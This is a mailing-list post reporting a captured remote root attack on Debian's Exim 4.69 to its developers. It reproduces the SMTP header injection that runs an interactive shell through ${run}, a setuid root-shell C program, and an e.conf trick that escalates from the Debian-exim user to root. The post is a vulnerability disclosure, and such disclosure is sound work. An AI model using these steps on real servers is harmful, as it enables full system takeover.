Hi, While investigating security break in the network of my company, I've captured (by tcpdump) sequence of successful remote root attack through Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I didn't find email of current maintainer of Exim, so I've decided to write to this mailing lists. I don't want to publish all details of attack before developers can investigate and fix vulnerability. So I ask Exim maintainers to contact me and I will send them complete captured sequence of attack. Here I can put brief sequence of attack:
EHLO mail.domain.com MAIL FROM: <[email protected]> RCPT TO: <[email protected]> DATA MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0 .... MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........ MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb .......... about 700000 the same strings .......... MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb MAILbombMAILb . MAIL FROM: <[email protected]> RCPT TO: <[email protected]> after that attacker gets shell with id of user Debian-exim and cwd in /var/spool/exim4 then it put file there file setuid with trivial execution of root shell: int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } and create another file e.conf with following content: spool_directory = ${run{/bin/chown root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}} the he runs: exim -Ce.conf -q and gets suid bit on /var/spool/exim4/setuid everything else is trivial. I haven't reproduced remote part of attack, but escalation from Debian-exim to root works also at exim4-daemon-light 4.72-2 from Debian Squeeze. With best regards, Sergey Kononenko. -- ## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
